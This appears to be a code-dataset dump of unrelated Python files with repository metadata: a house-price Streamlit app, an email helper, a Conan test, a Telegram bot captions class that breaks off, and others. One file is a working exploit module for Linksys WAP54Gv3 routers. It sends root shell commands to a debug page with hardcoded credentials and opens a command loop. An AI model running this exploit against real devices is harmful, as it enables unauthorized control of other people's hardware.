| 29.243902 | 118 | 0.667223 | 140 | 1,199 | 5.55 | 0.621429 | 0.07722 | 0.069498 | 0.084942 | 0.16731 | 0.095238 | 0 | 0 | 0 | 0 | 0 | 0.009317 | 0.194329 | 1,199 | 40 | 119 | 29.975 | 0.795031 | 0 | 0 | 0.117647 | 0 | 0 | 0.316097 | 0.018349 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.117647 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5deb628bbf28f92e9fb877f806010e3dd5181f9 | 11,265 | py | Python | House Rocket Company/projeto_portifolio.py | IgorQueiroz32/curso_meigaron_pyhton_ao_ds | 91e7b8336065dc841f620847997156bad6fed35e | [
"MIT"
] | null | null | null | House Rocket Company/projeto_portifolio.py | IgorQueiroz32/curso_meigaron_pyhton_ao_ds | 91e7b8336065dc841f620847997156bad6fed35e | [
"MIT"
] | null | null | null | House Rocket Company/projeto_portifolio.py | IgorQueiroz32/curso_meigaron_pyhton_ao_ds | 91e7b8336065dc841f620847997156bad6fed35e | [
"MIT"
] | null | null | null | import pandas as pd
import streamlit as st
import numpy as np
import plotly.express as px
st.set_page_config(layout='wide')  # makes the table on the page larger and wider
# read data
@st.cache(allow_output_mutation=True)  # lets the data be read from the virtual memory cache
def get_data(path):
data = pd.read_csv(path)
return data
# Load data
path = 'kc_house_data.csv'
data = get_data(path)
# transformation
# excluding outliers
data.drop(data[data['bedrooms']>11].index,inplace=True)
data.drop(data[(data['bedrooms']==0) | (data['bathrooms']==0)].index,inplace=True)
data.drop(data[(data['id']==125059179) | (data['id']==125059178)].index,inplace=True)
# data transformation
pd.set_option('display.float_format', lambda x: '%.3f' % x)
data['date'] = pd.to_datetime(data['date']).dt.strftime('%Y-%m-%d')
data['month_day'] = pd.to_datetime(data['date']).dt.strftime('%m-%d')
st.title('House Rocket Company')
st.markdown('Welcome to House Rocket Data Analysis')
# solving first question (which houses should be bought)
st.header('Houses to Buy')
price_median_buy = data[['price', 'zipcode']].groupby('zipcode').median().reset_index()
price_median_buy.columns = ['zipcode', 'price_median_buy']
houses_to_buy = pd.merge(data,price_median_buy,on='zipcode',how='inner')
for i in range(len(houses_to_buy)):
if (houses_to_buy.loc[i, 'price'] < houses_to_buy.loc[i, 'price_median_buy']) & (
houses_to_buy.loc[i, 'condition'] >= 3):
houses_to_buy.loc[i, 'status'] = 'buy'
else:
houses_to_buy.loc[i, 'status'] = 'do not buy'
first_column = houses_to_buy.pop('status')
houses_to_buy.insert(0, 'status', first_column)
st.dataframe(houses_to_buy)
st.write("This table informs which house is indicated to buy, also it presents all houses characteristics.")
#solving first question second part
st.header('Houses Recommendation to Buy')
for i in range(len(houses_to_buy)):
if (houses_to_buy.loc[i, 'bedrooms'] >= 8) | (houses_to_buy.loc[i, 'sqft_lot'] >= 1074218) | (
houses_to_buy.loc[i, 'bathrooms'] >= 4.25):
houses_to_buy.loc[i, 'recommendation_to_buy'] = 'very_high'
elif (houses_to_buy.loc[i, 'floors'] >= 2) & (houses_to_buy.loc[i, 'bedrooms'] >= 4) & (
houses_to_buy.loc[i, 'bedrooms'] <= 7) & (houses_to_buy.loc[i, 'bathrooms'] >= 2) & (
houses_to_buy.loc[i, 'bathrooms'] <= 4):
houses_to_buy.loc[i, 'recommendation_to_buy'] = 'high'
else:
houses_to_buy.loc[i, 'recommendation_to_buy'] = 'regular'
for i in range(len(houses_to_buy)):
if (houses_to_buy.loc[i, 'month_day'] >= '03-01') & (houses_to_buy.loc[i, 'month_day'] <= '05-31'):
houses_to_buy.loc[i, 'season'] = 'spring'
elif (houses_to_buy.loc[i, 'month_day'] >= '06-01') & (houses_to_buy.loc[i, 'month_day'] <= '08-31'):
houses_to_buy.loc[i, 'season'] = 'summer'
elif (houses_to_buy.loc[i, 'month_day'] >= '09-01') & (houses_to_buy.loc[i, 'month_day'] <= '11-30'):
houses_to_buy.loc[i, 'season'] = 'fall'
else:
houses_to_buy.loc[i, 'season'] = 'winter'
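# Hedged aside: the same season rule could also be derived from the month
# number instead of 'MM-DD' string comparisons (months 3-5 spring, 6-8 summer,
# 9-11 fall, the rest winter), e.g. pd.to_datetime(houses_to_buy['date']).dt.month.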
# solving second question first part (for how much the houses should be sold)
houses_buy_sell = houses_to_buy
houses_buy_sell = houses_buy_sell[houses_buy_sell.status == 'buy']
houses_buy_sell = houses_buy_sell.drop('status', axis=1)
first_column1 = houses_buy_sell.pop('recommendation_to_buy')
houses_buy_sell.insert(0,'recommendation_to_buy',first_column1)
price_median_sell = houses_buy_sell[['price', 'zipcode', 'season']].groupby(
['zipcode', 'season']).median().reset_index()
price_median_sell.columns = ['zipcode', 'season', 'price_median_sell']
houses_buy_sell = pd.merge(houses_buy_sell, price_median_sell, how='inner')
for i in range(len(houses_buy_sell)):
if (houses_buy_sell.loc[i, 'price'] < houses_buy_sell.loc[i, 'price_median_sell']) & (
houses_buy_sell.loc[i, 'recommendation_to_buy'] == 'regular'):
houses_buy_sell.loc[i, 'price_to_sell'] = houses_buy_sell.loc[i, 'price'] + (
houses_buy_sell.loc[i, 'price'] * 0.3)
elif (houses_buy_sell.loc[i, 'price'] < houses_buy_sell.loc[i, 'price_median_sell']) & (
houses_buy_sell.loc[i, 'recommendation_to_buy'] == 'high'):
houses_buy_sell.loc[i, 'price_to_sell'] = houses_buy_sell.loc[i, 'price'] + (
houses_buy_sell.loc[i, 'price'] * 0.375)
elif (houses_buy_sell.loc[i, 'price'] < houses_buy_sell.loc[i, 'price_median_sell']) & (
houses_buy_sell.loc[i, 'recommendation_to_buy'] == 'very_high'):
houses_buy_sell.loc[i, 'price_to_sell'] = houses_buy_sell.loc[i, 'price'] + (
houses_buy_sell.loc[i, 'price'] * 0.45)
elif (houses_buy_sell.loc[i, 'price'] > houses_buy_sell.loc[i, 'price_median_sell']) & (
houses_buy_sell.loc[i, 'recommendation_to_buy'] == 'regular'):
houses_buy_sell.loc[i, 'price_to_sell'] = houses_buy_sell.loc[i, 'price'] + (
houses_buy_sell.loc[i, 'price'] * 0.10)
elif (houses_buy_sell.loc[i, 'price'] > houses_buy_sell.loc[i, 'price_median_sell']) & (
houses_buy_sell.loc[i, 'recommendation_to_buy'] == 'high'):
houses_buy_sell.loc[i, 'price_to_sell'] = houses_buy_sell.loc[i, 'price'] + (
houses_buy_sell.loc[i, 'price'] * 0.125)
else:
houses_buy_sell.loc[i, 'price_to_sell'] = houses_buy_sell.loc[i, 'price'] + (
houses_buy_sell.loc[i, 'price'] * 0.15)
first_column2 = houses_buy_sell.pop('price_to_sell')
houses_buy_sell.insert(4, 'price_to_sell', first_column2)
#solving second question second part (when sell the houses)
for i in range(len(houses_buy_sell)):
houses_buy_sell.loc[i, 'profit'] = (houses_buy_sell.loc[i, 'price_to_sell']) - (houses_buy_sell.loc[i, 'price'])
first_column3 = houses_buy_sell.pop('profit')
houses_buy_sell.insert(5, 'profit', first_column3)
for i in range(len(houses_buy_sell)):
houses_buy_sell.loc[i,'profit_percentage_per_house'] = (((houses_buy_sell.loc[i,'price_to_sell']) - (houses_buy_sell.loc[i,'price'])) / houses_buy_sell.loc[i,'price']) * 100
first_column4 = houses_buy_sell.pop('profit_percentage_per_house')
houses_buy_sell.insert(6,'profit_percentage_per_house',first_column4)
for i in range(len(houses_buy_sell)):
houses_buy_sell.loc[i,'profit_percentage_total'] = ((houses_buy_sell.loc[i,'profit']) / (houses_buy_sell['profit'].sum())) * 100
first_column5 = houses_buy_sell.pop('profit_percentage_total')
houses_buy_sell.insert(7,'profit_percentage_total',first_column5)
time_to_sell = houses_buy_sell[['profit', 'profit_percentage_total', 'season']].groupby(['season']).sum().reset_index()
time_to_sell.columns = ['season', 'profit', 'profit_percentage_total']
df1 = houses_buy_sell[['profit', 'season','recommendation_to_buy','profit_percentage_total']].groupby(['season','recommendation_to_buy']).sum().reset_index()
df2 = houses_buy_sell[['id', 'season','recommendation_to_buy']].groupby(['season','recommendation_to_buy']).count().reset_index()
gen_ind_profit = pd.merge(df1,df2,how='inner')
for i in range(len(gen_ind_profit)):
gen_ind_profit.loc[i,'profit_each_house'] = (gen_ind_profit.loc[i,'profit']) / (gen_ind_profit.loc[i,'id'])
gen_ind_profit.columns = ['season','recommendation_to_buy','total_profit','profit_percentage_total','num_of_houses','mean_profit_each_house']
# build a table with the total purchase price, the total profit and the percentage difference
total_price = houses_buy_sell['price'].sum()
total_profit = houses_buy_sell['profit'].sum()
total = pd.DataFrame([[total_price, total_profit]], columns=['total_price', 'total_profit'])
for i in range(len(total)):
total.loc[i,'profit_percentage'] = ((total.loc[i,'total_profit']) / (total.loc[i,'total_price'])) * 100
# #plot map
# f_recommendation_to_buy = st.sidebar.multiselect('Enter Houses Recommendation to Buy',
# houses_buy_sell['recommendation_to_buy'].sort_values().unique()) # 3.3.1
#
# if f_recommendation_to_buy != []:
# houses_buy_sell_map = houses_buy_sell.loc[houses_buy_sell['recommendation_to_buy'].isin(f_recommendation_to_buy)]
#
# else:
# houses_buy_sell_map = houses_buy_sell.copy()
#
# st.dataframe(houses_buy_sell_map)
# st.write("Here the table is organised by houses recommendation, such as : regular, high and very high. Also it informs other houses characteristics, such as: price to sell, profit, and others.")
#
# st.header('Portfolio Map')
# st.write(" This map shows the location, price and condition of each house.")
# fig = px.scatter_mapbox(houses_buy_sell_map,
# lat = 'lat',
# lon = 'long',
# color = 'condition',
# size = 'price',
# color_continuous_scale = 'Bluered_r',
# size_max = 15,
# zoom = 10)
#
# fig.update_layout(mapbox_style = 'open-street-map')
# fig.update_layout(height = 600, margin = {'r':0, 't':0, 'l':0, 'b':0})
# st.plotly_chart(fig)
#
# st.header('Best Moment to Sell')
# st.dataframe(time_to_sell)
# st.write("According this table, summer presents the highest amount of profit, with more than 30 percent, so it is the best moment to sell houses.")
#
# st.header('General and Individual Profit')
# st.dataframe(gen_ind_profit)
# st.write("Here it is possible to identify the houses profit by season and houses recommendation, also the table shows the mean profit made by each house. ")
# st.write("This table informs that regular houses make the highest profit than the others recommendations in every season, flouting between 15.5 and 27.5 percent, with summer presenting the highest profit andd winter the lowest.")
# st.write("However, dividing the profit by the number of houses, both related to each type of house recommendation, houses very high recommended presents the highest profit among all recommendations. Where summer is at first position with $138675,00 of profit per house; and winter at last position with $88,262.1429.")
#
# st.header('Total Profit Percentage')
# st.dataframe(total)
# st.write("This table represents the total profit by buying and selling all houses recommended to buy. It informs that, by following this project, the company would have a profit of almost 19 percent, Which is more than $771 millions.")
s = data[data['waterfront'] == 'yes']
st.dataframe(s)
st.title('Hypothesis')
c1, c2 = st.beta_columns((1, 1))
st.header('Hypothesis 01: Houses with water view are 20% more expensive, on the average.')
h1 = data[['price', 'waterfront']].groupby('waterfront').mean().reset_index()
# (most expensive item - cheapest item) / cheapest item * 100
h1_answer = ((h1.loc[1, 'price']) - (h1.loc[0, 'price'])) / (h1.loc[0, 'price']) * 100
fig = px.bar(h1, x='waterfront', y='price')
c1.plotly_chart(fig, use_container_width=True)
c2.dataframe(h1)
st.write('False: Houses with water view are {:.1f} percent more expensive'.format(h1_answer))
| 49.845133 | 321 | 0.679095 | 1,680 | 11,265 | 4.292857 | 0.194643 | 0.098586 | 0.142402 | 0.095397 | 0.433583 | 0.382557 | 0.288547 | 0.229895 | 0.191902 | 0.186911 | 0 | 0.019719 | 0.171682 | 11,265 | 225 | 322 | 50.066667 | 0.753188 | 0.270661 | 0 | 0.201613 | 0 | 0 | 0.26207 | 0.072986 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008065 | false | 0 | 0.032258 | 0 | 0.048387 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5def7912a76945ddbbf8544b1d7e3567390b9f4 | 1,837 | py | Python | maza/modules/exploits/routers/linksys/wap54gv3_rce.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | 2 | 2020-02-06T20:24:31.000Z | 2022-03-08T19:07:16.000Z | maza/modules/exploits/routers/linksys/wap54gv3_rce.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | null | null | null | maza/modules/exploits/routers/linksys/wap54gv3_rce.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | null | null | null | import re
from maza.core.exploit import *
from maza.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "Linksys WAP54Gv3",
"description": "Module exploits remote command execution in Linksys WAP54Gv3 devices. "
"Debug interface allows executing root privileged shell commands is available "
"on dedicated web pages on the device.",
"authors": (
"Phil Purviance", # vulnerability discovery
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
"references": (
"http://seclists.org/bugtraq/2010/Jun/93",
),
"devices": (
"Linksys WAP54Gv3",
)
}
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(80, "Target HTTP port")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self)
else:
print_error("Target is not vulnerable")
def execute(self, cmd):
data = {"data1": cmd, "command": "ui_debug"}
response = self.http_request(
method="POST",
path="/debug.cgi",
data=data,
auth=("Gemtek", "gemtekswd")
)
if response is None:
return ""
res = re.findall('<textarea rows=30 cols=100>(.+?)</textarea>', response.text, re.DOTALL)
if len(res):
return res[0]
return ""
@mute
def check(self):
mark = utils.random_text(32)
cmd = "echo {}".format(mark)
response = self.execute(cmd)
if mark in response:
return True # target is vulnerable
return False # target is not vulnerable
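    # Descriptive aside: check() probes the target by echoing a random
    # 32-character marker through the debug interface and looking for that
    # marker in the response; a low-impact way to confirm command execution.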
| 28.261538 | 102 | 0.549809 | 192 | 1,837 | 5.203125 | 0.598958 | 0.032032 | 0.024024 | 0.042042 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02381 | 0.336962 | 1,837 | 64 | 103 | 28.703125 | 0.796388 | 0.048449 | 0 | 0.078431 | 0 | 0 | 0.317269 | 0.027539 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.058824 | 0 | 0.294118 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5e08860d8f2994d7150f270e35eaf30cd51d00e | 1,642 | py | Python | client/debian/opt/mirrorcast/hosts.py | 3djake/mirrorcast | 37d19a3b0dcea2529387b0c58245368bdde1f012 | [
"Xnet",
"X11"
] | 36 | 2017-10-30T02:06:24.000Z | 2022-03-08T05:45:58.000Z | client/debian/opt/mirrorcast/hosts.py | 3djake/mirrorcast | 37d19a3b0dcea2529387b0c58245368bdde1f012 | [
"Xnet",
"X11"
] | 5 | 2018-02-06T17:13:14.000Z | 2019-09-11T07:02:01.000Z | client/debian/opt/mirrorcast/hosts.py | 3djake/mirrorcast | 37d19a3b0dcea2529387b0c58245368bdde1f012 | [
"Xnet",
"X11"
] | 6 | 2018-01-13T22:45:46.000Z | 2020-12-13T19:17:33.000Z | # -*- coding: utf-8 -*-
import logging, os, csv, logging.handlers
mirror_logger = logging.getLogger()
mirror_logger.setLevel(logging.DEBUG)
handler = logging.handlers.SysLogHandler(address = '/dev/log')
formatter = logging.Formatter(' mirrorcast - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
mirror_logger.addHandler(handler)
#logging.basicConfig(filename='/opt/mirrorcast/mirrorcast.log',level=logging.DEBUG,format='%(asctime)s %(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')
class Hosts():
def __init__(self):
self.receivers = []
self.receiver = "None"
#load list of receivers from file
        try:
            with open(os.path.dirname(os.path.abspath(__file__)) + "/receivers") as csvfile:
                reader = csv.DictReader(csvfile)
                for line in reader:
                    self.receivers.append(line)
        except Exception:
            mirror_logger.error("Failed to load host names")
            exit(0)
self.aspect = self.receivers[0]['aspect']
#set receiver to the one picked by the user
def set_receiver(self, but, name):
self.receiver = str(but.get_label())
for i in self.receivers:
if i['host'] == self.receiver and but.get_active():
self.aspect = i['aspect']
mirror_logger.info("Receiver set to: " + i['host'] + " Receivers aspect: " + self.aspect)
return
if but.get_active():
self.receiver = "None"
self.aspect = "16:9"
mirror_logger.info("Receiver set to: " + self.receiver)
| 39.095238 | 148 | 0.596833 | 196 | 1,642 | 4.908163 | 0.464286 | 0.074844 | 0.018711 | 0.033264 | 0.060291 | 0.060291 | 0 | 0 | 0 | 0 | 0 | 0.004983 | 0.266748 | 1,642 | 41 | 149 | 40.04878 | 0.79402 | 0.147381 | 0 | 0.0625 | 0 | 0 | 0.130216 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.03125 | 0 | 0.15625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5e0e3dcd9cc4a1675a98c9eba308c33df18c2ec | 1,858 | py | Python | conans/test/functional/toolchains/meson/test_test.py | JoachimKuebart-TomTom/conan | bf716c094d6b3f5acd727eed3c4b4fe1ad9e1c00 | [
"MIT"
] | 6,205 | 2015-12-01T13:40:05.000Z | 2022-03-31T07:30:25.000Z | conans/test/functional/toolchains/meson/test_test.py | JoachimKuebart-TomTom/conan | bf716c094d6b3f5acd727eed3c4b4fe1ad9e1c00 | [
"MIT"
] | 8,747 | 2015-12-01T16:28:48.000Z | 2022-03-31T23:34:53.000Z | conans/test/functional/toolchains/meson/test_test.py | JoachimKuebart-TomTom/conan | bf716c094d6b3f5acd727eed3c4b4fe1ad9e1c00 | [
"MIT"
] | 961 | 2015-12-01T16:56:43.000Z | 2022-03-31T13:50:52.000Z | import os
import platform
import pytest
import textwrap
from conans.test.assets.sources import gen_function_cpp
from conans.test.functional.toolchains.meson._base import TestMesonBase
@pytest.mark.tool_pkg_config
@pytest.mark.skipif(platform.system() == "Windows", reason="Doesn't work in Windows")
class MesonTest(TestMesonBase):
_test_package_meson_build = textwrap.dedent("""
project('test_package', 'cpp')
hello = dependency('hello', version : '>=0.1')
test_package = executable('test_package', 'test_package.cpp', dependencies: hello)
test('test package', test_package)
""")
_test_package_conanfile_py = textwrap.dedent("""
import os
from conans import ConanFile
from conan.tools.meson import Meson, MesonToolchain
class TestConan(ConanFile):
settings = "os", "compiler", "build_type", "arch"
generators = "pkg_config"
def generate(self):
tc = MesonToolchain(self)
tc.generate()
def build(self):
meson = Meson(self)
meson.configure()
meson.build()
def test(self):
meson = Meson(self)
meson.configure()
meson.test()
""")
def test_reuse(self):
self.t.run("new hello/0.1 -s")
test_package_cpp = gen_function_cpp(name="main", includes=["hello"], calls=["hello"])
self.t.save({os.path.join("test_package", "conanfile.py"): self._test_package_conanfile_py,
os.path.join("test_package", "meson.build"): self._test_package_meson_build,
os.path.join("test_package", "test_package.cpp"): test_package_cpp})
self.t.run("create . hello/0.1@ %s" % self._settings_str)
self._check_binary()
| 32.034483 | 99 | 0.609795 | 212 | 1,858 | 5.141509 | 0.349057 | 0.161468 | 0.06422 | 0.080734 | 0.161468 | 0.06789 | 0.06789 | 0 | 0 | 0 | 0 | 0.004405 | 0.266954 | 1,858 | 57 | 100 | 32.596491 | 0.795888 | 0 | 0 | 0.190476 | 0 | 0 | 0.548439 | 0.037675 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02381 | false | 0 | 0.214286 | 0 | 0.309524 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5e592573090b48a85fca155922e80c7a71aa738 | 1,807 | py | Python | FFL/game/alert.py | LS80/FFL | a853932598ab6c7ae31e2935c83607ff9968ed37 | [
"MIT"
] | null | null | null | FFL/game/alert.py | LS80/FFL | a853932598ab6c7ae31e2935c83607ff9968ed37 | [
"MIT"
] | null | null | null | FFL/game/alert.py | LS80/FFL | a853932598ab6c7ae31e2935c83607ff9968ed37 | [
"MIT"
] | 1 | 2019-07-15T06:40:46.000Z | 2019-07-15T06:40:46.000Z | import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.utils import COMMASPACE, formatdate
from email import encoders
from os.path import basename
class HTMLEmail(object):
def __init__(self, to, sender, name, bcc=None, reply_to=None):
        assert isinstance(to, list)
self.to = to
self.sender = sender
self.name = name
if bcc is not None:
self.bcc = [bcc]
else:
self.bcc = []
self.reply_to = reply_to
def send(self, subject, html, smtp_server, images=[], zipfile=None):
msg = MIMEMultipart()
msg['From'] = '{0} <{1}>'.format(self.name, self.sender)
msg['To'] = COMMASPACE.join(self.to)
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
if self.reply_to is not None:
msg['Reply-To'] = self.reply_to
msg.attach(MIMEText(html.encode('utf-8'), 'html', 'utf-8'))
for i, image in enumerate(images):
img = MIMEImage(image.read())
img.add_header('Content-ID', '<image{0}>'.format(i+1))
msg.attach(img)
if zipfile:
zip = MIMEBase('application', 'zip')
zip.set_payload(zipfile.read())
encoders.encode_base64(zip)
            zip.add_header('Content-Disposition', 'attachment; filename=%s' % basename(zipfile.name))
msg.attach(zip)
smtp = smtplib.SMTP(smtp_server)
smtp.sendmail(self.sender, set(self.to+self.bcc), msg.as_string())
smtp.close()
if __name__ == '__main__':
em = HTMLEmail(['test@lee-smith.me.uk'],
"lee@lee-smith.me.uk", "FFL",
bcc="bcc@lee-smith.me.uk", reply_to="reply@lee-smith.me.uk")
    em.send('Testing', '<h1>Testing</h1><br><img height="500px" width="700px" src="cid:image1">',
            'localhost', images=[open('test.png', 'rb')])
| 31.701754 | 95 | 0.660764 | 260 | 1,807 | 4.496154 | 0.388462 | 0.041916 | 0.044482 | 0.041061 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011417 | 0.175982 | 1,807 | 57 | 96 | 31.701754 | 0.773674 | 0 | 0 | 0 | 0 | 0.021277 | 0.17637 | 0.025685 | 0 | 0 | 0 | 0 | 0.021277 | 1 | 0.042553 | false | 0 | 0.170213 | 0 | 0.234043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5e5a2d0a8855ac8866eb2bdacdaddaecc238eb1 | 16,781 | py | Python | captions.py | marsDurden/UnipdBot | 402b74f6bd876265b952f052e2c132f6aa3c050d | [
"Unlicense"
] | 4 | 2018-04-12T03:39:36.000Z | 2019-11-26T07:52:30.000Z | captions.py | marsDurden/UnipdBot | 402b74f6bd876265b952f052e2c132f6aa3c050d | [
"Unlicense"
] | null | null | null | captions.py | marsDurden/UnipdBot | 402b74f6bd876265b952f052e2c132f6aa3c050d | [
"Unlicense"
] | 1 | 2019-10-07T16:50:48.000Z | 2019-10-07T16:50:48.000Z | import pickle, json, datetime, requests
from bs4 import BeautifulSoup
from geopy.distance import vincenty
from datetime import datetime
from threading import Timer
from config import uniopen_url
class Captions:
def __init__(self, supported_languages, captions_path, quick=True):
self.data = dict()
self.columns = supported_languages
self.default = 'it'
self.path = captions_path
# Update menu every 15 minutes
#self.update_thread = RepeatedTimer(60*15, self.update_mense)
if quick:
try:
self.data = pickle.load( open( self.path + "captions.pkl", "rb" ) )
except FileNotFoundError:
self.update_json()
else:
self.update_json()
self.daily_mensa = {'new': [], 'completed': []}
    def stop(self):
        # the update thread is only created when background updates are enabled
        if hasattr(self, 'update_thread'):
            self.update_thread.stop()
def update_json(self):
# Load languages json
for filename in self.columns:
with open(self.path + filename + '.json', 'r') as f:
self.data[filename] = json.load(f)
# Utils json
with open(self.path + 'biblio.json', 'r') as f:
self.data['sub_commands'] = json.load(f)
for filename in ['aule_studio', 'mense']:
with open(self.path + filename + '.json', 'r') as f:
a = json.load(f)
self.data['sub_commands'] = {**self.data['sub_commands'], **a}
with open(self.path + 'keyboard.json', 'r') as f:
self.data['keyboard'] = json.load(f)
#print(json.dumps(self.data['sub_commands'], indent=4))
# Save as pickle
pickle.dump( self.data, open( self.path + "captions.pkl", "wb" ) )
def get_reply(self, name, lang=None):
if lang is None: lang = self.default
try:
data = self.data[lang][name]
except KeyError:
data = self.data['sub_commands'][name]
if data['type'] == 0: # Principali
return data['reply']
elif data['type'] == 1: # Biblioteche / aulestudio
string = self.data[lang]['type-1-string']
posti = ''
# Get number of seats left
if name == 'pinali':
n = requests.get("http://zaphod.cab.unipd.it/pinali/PostiLiberiPinali.txt").text.replace(' ','').replace('\n','')
posti = '_' + string[1] + ':_ ' + n + '\n'
elif name == 'metelli':
n = requests.get("http://zaphod.cab.unipd.it/psico/disponibilita.txt").text.replace(' ','').replace('\n','')
posti = '_' + string[1] + ':_ ' + n + '\n'
elif name == 'bibliogeo':
n = requests.get("https://docs.google.com/spreadsheets/d/e/2PACX-1vRG83kEytkR_pNTo-aOLmxnvuQiHXVI926S6ZzIbyv2WOTV3emPF6Y70od3oUR3pJ1JZ8JxyG959vMw/pubhtml?gid=1179896160&single=true")
n = BeautifulSoup(n.text, 'html.parser')
n = n.findAll("td", {"class": "s1"})
posti = '_' + string[1] + ':_ ' + n[0].text + '\n_' + string[2] + ':_ ' + n[1].text + '\n'
elif name == 'matematica':
n = requests.get("https://wss.math.unipd.it/biblioteca/posti_liberi.txt").text.replace('\n','')
if n != 'dato non disponibile': posti = '_' + string[1] + ':_ ' + n + '\n'
reply = string[0].format(data['title'], posti, data['address'], data['timetable'])
dict_days = self.data[lang]['orario']['reply']['days']
list_days = list(dict_days)
for i, day in enumerate(dict_days.values()):
reply = reply.replace(list_days[i], day)
return reply
elif data['type'] == 2: # Mense
list_string = self.data[lang]['type-2-string']
# Opened or closed pranzo/cena
pranzo = '*' + list_string[1] + '* ' + list_string[3].format(data['pranzo']['apertura'], data['pranzo']['chiusura']) if data['pranzo']['aperta'] else '*' + list_string[2] + '*'
cena = '*' + list_string[1] + '* ' + list_string[3].format(data['cena']['apertura'], data['cena']['chiusura']) if data['cena']['aperta'] else '*' + list_string[2] + '*'
reply = list_string[0].format(data['nome'], data['indirizzo'], pranzo, cena)
# Menu
if datetime.utcnow().hour < 15: # Pranzo
if data['pranzo']['primo'] != '':
reply += list_string[4].format(data['pranzo']['primo'], data['pranzo']['secondo'], data['pranzo']['contorno'])
if data['pranzo']['dessert'] != '':
reply += list_string[5].format(data['pranzo']['dessert'])
else: # Cena
if data['cena']['primo'] != '':
reply += list_string[4].format(data['cena']['primo'], data['cena']['secondo'], data['cena']['contorno'])
if data['cena']['dessert'] != '':
reply += list_string[5].format(data['cena']['dessert'])
return reply
def get_keyboard(self, name, lang=None, isGroup=False):
if lang is None: lang = self.default
# Keyboards
if name == 'home':
if not isGroup:
markup = [['orario', 'mensa'],
['biblioteca', 'aulastudio'],
['diritto_studio', 'udupadova'],
['vicino a te', 'botinfo']]
else:
markup = [['orario'],
['mensa', 'aulastudio'],
['biblioteca', 'udupadova'],
['diritto_studio', 'botinfo']]
elif name == 'mensa':
markup = [["sanfrancesco", "piovego"],
["agripolis", "acli"],
["belzoni", "murialdo"],
["forcellini", "home"]]
elif name == 'aulastudio':
markup = [["jappelli", "pollaio"],
["titolivio", "galilei"],
["marsala", "viavenezia"],
["aulaSanGaetano", "reset"],
["home"]]
elif name == 'biblioteca':
markup = [["bibliodiritto", "filosofia", "ingegneria"],
["someda", "maldura", "matematica"],
["storia", "metelli", "pinali"],
["caborin", "cuzabarella", "universitaria"],
["bibliochimica", "agribiblio", "bibliogeo"],
["sangaetano", "liviano", "bibliofarmacia"],
["vbranca", "home"]]
elif name == 'diritto_studio':
markup = [["borse", "tasse"],
["200ore", "informami"],
["home"]]
elif name == 'udupadova':
markup = [["faqlibretto", "erasmus"],
["controguida", "cambiocorso"],
["assembleaudu", "sedeudu"],
["home"]]
else:
data = self.data['keyboard'][name]
            # Replace the inline button labels
if data['inline']:
try:
for i, item in enumerate(self.data[lang][name]['markup'].values()):
data['markup'][str(i)]['text'] = item
except KeyError:
pass
return [_ for _ in data.values()]
        # Replace the command names in the keyboard
for i, row in enumerate(markup):
for j, caption in enumerate(row):
try:
markup[i][j] = self.data[lang]['commands'][caption]
except (KeyError, TypeError):
try:
markup[i][j] = self.data[lang]['sub_commands'][caption]
except (KeyError, TypeError):
pass
if ' ' not in markup[i][j]: markup[i][j] = '/' + markup[i][j]
return markup
def get_command_handlers(self, key):
reply = []
if key == 'sub_commands':
